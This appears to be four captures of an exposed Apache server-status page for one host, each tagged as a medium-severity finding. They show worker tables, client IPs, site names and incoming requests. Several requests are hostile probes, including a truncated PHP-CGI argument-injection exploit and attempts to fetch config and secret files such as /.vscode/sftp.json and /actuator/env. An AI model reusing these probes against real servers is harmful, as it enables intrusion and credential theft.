Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 26-Dec-2025 02:45:48 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 64 Parent Server MPM Generation: 63 Server uptime: 12 days 19 hours 41 minutes 42 seconds Server load: 0.01 0.08 0.08 Total accesses: 353357 - Total Traffic: 11.5 GB - Total Duration: 371657973 CPU Usage: u28.03 s37.59 cu2039.13 cs1271.08 - .305% CPU load .319 requests/sec - 10.9 kB/second - 34.2 kB/request - 1051.79 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01299522no0yes010000 11299392no0yes19000 21299390no0yes010000 31299391no0yes010000 41299389no0yes010000 Sum500 149000 ___________W______________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-6312995220/9/7815_ 0.467035319770.00.38287.75 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-6312995220/4/8245_ 0.29492846181000.00.09270.88 162.158.186.182h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6312995220/4/7761_ 0.4214174408630.00.20256.29 188.114.111.96h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6312995220/7/8010_ 0.456040001510.00.10220.86 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 0-6312995220/9/7758_ 0.470037364380.01.13190.95 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-6312995220/9/8004_ 0.464084027000.00.39228.38 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-6312995220/6/7824_ 0.461042522990.00.18343.47 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 0-6312995220/5/8171_ 0.457047673310.00.23227.32 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 0-6312995220/7/7752_ 0.462093007940.00.62333.08 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-6312995220/8/7974_ 0.468037909060.00.14254.73 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-6312993920/5/6093_ 0.261033330940890.00.18249.38 104.23.170.179h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/8/6011W 0.430037384640.00.21169.81 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-6312993920/1/5922_ 0.09233745443450.00.09195.86 104.23.166.11h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/10/5861_ 0.436033596780.00.13119.40 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-6312993920/6/6122_ 0.381130038465480.00.15193.66 172.71.81.136h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-6312993920/9/5951_ 0.443043529840.00.18188.64 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-6312993920/11/5907_ 0.43120153140060.00.30169.20 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 1-6312993920/3/6001_ 0.341313441985260.00.10186.65 146.190.244.142http/1.1barrerasdecontencion.com:443POST /wp-login.php HTTP/1.1 1-6312993920/4/5912_ 0.36351068640390.00.20225.10 162.158.91.26h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/5/6120_ 0.4311043150240.00.18140.14 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 2-6312993900/0/6653_ 0.00654040333360.00.00300.06 162.158.159.36h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/0/6632_ 0.006540858919130.00.00253.10 104.23.186.244h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/0/6721_ 0.00654042914860.00.00220.68 162.158.62.68h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/0/6702_ 0.0065431590323300.00.00196.71 104.23.166.5h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/0/6670_ 0.00654043306700.00.00281.99 104.22.7.118h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/0/6805_ 0.00654036383470.00.00246.50 103.23.60.244http/1.1 2-6312993900/0/6709_ 0.00654052929040.00.00283.82 103.23.60.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/0/6739_ 0.0065435942448920.00.00219.79 172.71.102.252h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/0/6571_ 0.0065430040149650.00.00283.74 172.70.214.83h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/0/6868_ 0.0065430748807480.00.00208.38 162.159.113.117h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/0/8633_ 0.0065455553443990.00.00269.14 172.71.135.118h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/0/8466_ 0.0065431267075520.00.00260.41 162.159.113.62h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/0/8357_ 0.00654307132598960.00.00306.94 104.23.170.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/0/8512_ 0.0065452959326710.00.00267.03 162.158.41.30h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/0/8765_ 0.0065433357374090.00.00296.09 172.71.135.118http/1.1tandemsl.com:443GET /seguridad-de-producto-blog/gestion-de-residuos-base-de-dat 3-6312993910/0/8335_ 0.00654055479520.00.00253.58 104.23.190.149h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/0/8566_ 0.00654327182762550.00.00247.33 172.70.206.112h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/0/8716_ 0.006543960512560.00.00380.57 162.158.122.178h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/0/8629_ 0.0065436657209090.00.00304.20 104.23.166.185h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/0/8529_ 0.0065430350049250.00.00247.80 104.23.166.75h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-6312993890/1/6130_ 0.05480277169406880.00.09251.07 104.23.170.26h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-6312993890/0/5964_ 0.004695447466540.00.00163.48 162.158.123.206h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-6312993890/0/6157_ 0.00469065449740.00.00214.82 104.23.254.221h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-6312993890/1/6189_ 0.0547417548623680.00.00239.04 162.158.102.128h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-6312993890/0/6188_ 0.00475441927050.00.00178.59 104.23.190.252h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-6312993890/0/6044
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a8580274df66ff
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 24-Dec-2025 03:20:50 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 52 Parent Server MPM Generation: 51 Server uptime: 10 days 20 hours 16 minutes 44 seconds Server load: 0.06 0.10 0.09 Total accesses: 321618 - Total Traffic: 10.6 GB - Total Duration: 244244278 CPU Usage: u53.23 s55.65 cu1795.55 cs1070.48 - .317% CPU load .343 requests/sec - 11.9 kB/second - 34.6 kB/request - 759.424 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01102369no0yes19000 11102502no0yes010000 21102368no0yes010000 31102370no0yes010000 41102367no0yes010000 Sum500 149000 ___W______________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-5111023690/134/6912_ 12.922032721230.02.26264.56 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 0-5111023690/145/7361_ 12.8412138067180.03.84224.85 188.114.111.100h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5111023690/138/6871_ 12.922070071450.02.35226.40 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-5111023690/129/7096W 12.920036530670.03.21198.85 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-5111023690/125/6859_ 12.804132273020.04.72159.68 162.158.90.128h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5111023690/141/7116_ 12.924074606170.02.37203.49 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-5111023690/117/6935_ 12.927036537240.01.90323.58 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-5111023690/131/7285_ 12.928033929390.03.44208.80 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-5111023690/123/6857_ 12.827033124370.02.39312.52 162.158.91.190h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5111023690/140/7049_ 12.7612035090020.02.43221.39 172.68.26.57h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5111025020/132/5523_ 12.10115229375630.01.74235.30 71.6.199.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-5111025020/136/5428_ 12.68116031612830.014.49152.79 172.71.95.65h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5111025020/115/5356_ 11.1383780128576310.01.24181.97 162.158.186.242h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5111025020/118/5295_ 12.27226026255140.02.66105.85 162.159.122.33h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5111025020/115/5515_ 11.4522130931828200.02.28174.95 172.70.142.3h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5111025020/122/5390_ 11.9822138833043450.02.30177.34 104.23.166.55h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5111025020/117/5340_ 12.45110383149375800.02.13155.25 172.68.22.46h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5111025020/120/5396_ 11.498372138858300.03.54173.80 188.114.111.209h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5111025020/120/5356_ 12.64226028492240.01.72209.21 172.70.214.94h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5111025020/124/5551_ 11.4811137641395720.05.20127.08 71.6.199.87http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5111023680/102/6195_ 12.53937439278160.03.10291.68 172.71.120.21h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5111023680/107/6148_ 12.7410649106258550.04.36243.30 172.69.50.233h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5111023680/121/6276_ 12.772031378850.03.19211.28 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-5111023680/114/6229_ 12.779087197830.02.66182.97 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-5111023680/103/6197_ 12.613037258950.02.92260.06 43.153.49.151http/1.1barrerasdecontencion.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5111023680/116/6335_ 12.491034854450.013.06238.59 172.71.103.84h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5111023680/107/6258_ 12.776032291910.03.66274.73 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-5111023680/120/6281_ 12.7610041206940.02.14206.53 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-5111023680/127/6125_ 12.771039236760.03.88276.92 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-5111023680/101/6414_ 12.626040395270.03.77201.09 162.158.186.19h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5111023700/9/8134_ 8.07224051667660.00.59257.92 172.64.217.165h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5111023700/6/7956_ 8.06220665878910.00.05255.12 162.158.158.54h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5111023700/4/7824_ 8.062200130506960.00.08297.63 172.70.210.139h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5111023700/2/7989_ 2.34220058108090.00.02259.45 44.220.185.222http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5111023700/8/8246_ 7.65220056023350.00.11274.01 162.158.23.172h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5111023700/4/7832_ 4.81220054151780.00.37244.19 104.23.172.60h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5111023700/7/8037_ 8.07219066715470.00.27239.18 162.158.186.245h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5111023700/5/8198_ 5.81219059273570.00.02361.72 172.68.12.59h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5111023700/7/8116_ 5.82222455888170.00.11270.58 104.23.248.5h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5111023700/7/8045_ 5.82222048189300.00.13241.74 104.23.248.200h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5111023670/6/5418_ 7.682201149058970.00.39234.88 104.23.187.181h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5111023670/9/5213_ 7.69225133695980.01.55149.33 162.158.187.139h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5111023670/9/5458_ 5.56222025237060.00.22179.23 172.68.12.210h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5111023670/11/5455_ 7.68221043393790.00.71206.70 172.70.231.80h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5111023670/7/5467_ 6.05222034963060.00.56148.44 172.71.166.214h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-51
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802aa6aaa14
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 22-Dec-2025 04:57:37 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 44 Parent Server MPM Generation: 43 Server uptime: 8 days 21 hours 53 minutes 31 seconds Server load: 0.24 0.14 0.10 Total accesses: 229667 - Total Traffic: 8.1 GB - Total Duration: 176438231 CPU Usage: u88.64 s82.68 cu1322.74 cs816.35 - .3% CPU load .298 requests/sec - 11.0 kB/second - 36.9 kB/request - 768.235 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0880924no0yes19000 1880921no0yes010000 2880923no2yes010001 3881056no0yes010000 4880922no0yes010000 Sum502 149001 _W________________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-438809240/301/4617_ 30.5910021487990.07.08190.36 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 0-438809240/276/4767W 30.560025165190.022.10169.14 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-438809240/311/4556_ 30.584058658600.04.85178.34 162.142.125.120http/1.1 0-438809240/279/4737_ 30.5910024984480.06.62160.73 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 0-438809240/288/4585_ 30.569222457090.06.56108.95 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-438809240/287/4840_ 30.5711063678680.07.29158.59 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 0-438809240/274/4719_ 30.5911026161490.05.19214.96 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 0-438809240/306/4839_ 30.592020565830.05.00151.79 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 0-438809240/278/4623_ 30.603019357510.013.10256.38 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-438809240/291/4662_ 30.3310023375790.04.87152.38 162.142.125.120h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-438809210/20/3902_ 18.8990017083190.00.17164.25 104.23.203.166h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-438809210/22/3810_ 17.54390017926170.01.36107.31 172.71.151.90h2lcftech.es:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-438809210/21/3727_ 17.51392014973550.00.58138.52 172.71.151.222h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-438809210/22/3741_ 17.52392012979510.00.1168.57 172.71.150.164h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-438809210/28/3837_ 18.8990417506950.00.49141.14 104.23.203.159h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-438809210/12/3849_ 18.89392020932930.01.19139.23 104.23.203.157h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-438809210/24/3661_ 18.893920135866140.02.06102.37 104.23.203.157h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-438809210/26/3834_ 18.843922124852190.00.29137.41 162.158.122.178h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-438809210/29/3778_ 18.999540014925300.00.93143.75 104.23.175.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-438809210/28/3946_ 18.89390028899790.00.8785.20 104.23.203.155h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-438809230/235/5094_ 29.101027854820.02.97248.36 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-438809230/231/5026_ 29.10630391638280.03.25198.09 172.70.93.24h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-438809230/266/5153_ 28.99156321773380.013.53184.56 162.142.125.120http/1.1 2-438809230/232/5107_ 29.104066187120.05.16159.19 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-438809230/240/5085_ 29.105025251150.05.21206.06 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-438809230/239/5203_ 29.103022380750.03.62202.95 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-438809230/226/5138_ 29.102020494120.05.79243.14 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-438809230/206/5153_ 29.091029178710.06.09181.69 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-438809230/221/5018_ 29.02432024977760.03.88220.67 162.142.125.120http/1.1 2-438809230/231/5231_ 29.09619528248490.03.91147.38 172.70.93.24h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-438810560/152/5804_ 23.80391031200650.02.80215.57 104.23.203.185h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-438810560/148/5812_ 23.75392045760880.03.09212.57 162.158.63.83h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-438810560/159/5651_ 23.803960111230460.03.43240.69 104.23.203.145h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-438810560/157/5698_ 23.80397041461380.02.62185.35 104.23.203.209h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-438810560/140/5832_ 17.56398037962190.02.98192.21 172.64.217.129h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-438810560/172/5609_ 22.52392035804450.02.46198.69 172.71.150.71h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-438810560/132/5809_ 22.28392049430970.03.11200.27 162.158.123.18h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-438810560/144/5892_ 22.51393041648960.03.27264.28 172.71.150.31h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-438810560/162/5805_ 19.96391038204630.04.98197.53 104.23.251.38h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-438810560/143/5707_ 23.08397028847320.02.95186.08 162.158.122.41h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-438809220/153/3539_ 24.083970137246890.023.95161.91 104.23.203.196h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-438809220/146/3454_ 24.08396021764380.01.80106.64 104.23.203.188h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-438809220/146/3595_ 24.07391013593110.01.08128.75 104.23.203.188h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-438809220/149/3576_ 21.053916332749380.03.21165.46 188.164.198.78http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-438809220/139/3633_ 20.01391024321930.09.2798.38 104.22.23.76h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-438809220/179/3493_ 23.99392018978610.02.3598.30
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802ebc18101
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 20-Dec-2025 03:33:13 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 33 Parent Server MPM Generation: 32 Server uptime: 6 days 20 hours 29 minutes 7 seconds Server load: 0.06 0.05 0.05 Total accesses: 193143 - Total Traffic: 7.2 GB - Total Duration: 127944238 CPU Usage: u64.36 s59.1 cu1062.76 cs648.67 - .31% CPU load .326 requests/sec - 12.8 kB/second - 39.2 kB/request - 662.433 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0745931no0yes010000 1745928no1yes010000 2745930no0yes19000 3746109no0yes010000 4745929no0yes010000 Sum501 149000 _____________________W____________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-327459310/19/4162_ 12.2227822019676210.00.25179.86 172.64.200.157h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-327459310/21/4338_ 11.512914023382430.00.14144.30 172.68.3.38h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-327459310/19/4085_ 10.69291385423920680.00.35169.17 172.64.200.235h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-327459310/17/4308_ 12.172777023137160.00.03151.81 104.23.237.58h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-327459310/15/4150_ 11.092777020583280.00.3299.90 104.22.24.112h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-327459310/19/4421_ 12.172782028477570.00.54148.72 104.23.237.93h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-327459310/13/4297_ 12.2427822224233740.00.17200.55 172.64.200.157h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-327459310/16/4379_ 10.6929141718433590.00.10142.79 162.158.172.94h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-327459310/16/4206_ 10.6929141617388100.00.37240.47 162.158.172.94h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-327459310/19/4225_ 10.6929131921487040.00.46144.41 162.158.172.94h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-327459280/255/3475_ 23.693013738590.021.82144.23 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-327459280/250/3332_ 23.686014476350.05.0895.65 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 1-327459280/266/3287_ 23.696011899390.05.42130.18 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-327459280/233/3296_ 23.69509686900.06.8853.15 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-327459280/252/3377_ 23.693013427920.06.29132.97 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 1-327459280/257/3406_ 23.684017646980.021.17130.09 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 1-327459280/233/3220_ 23.710022174830.06.0891.21 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-327459280/258/3375_ 23.692021373010.034.64128.76 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 1-327459280/237/3328_ 23.702011504770.05.29133.41 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config 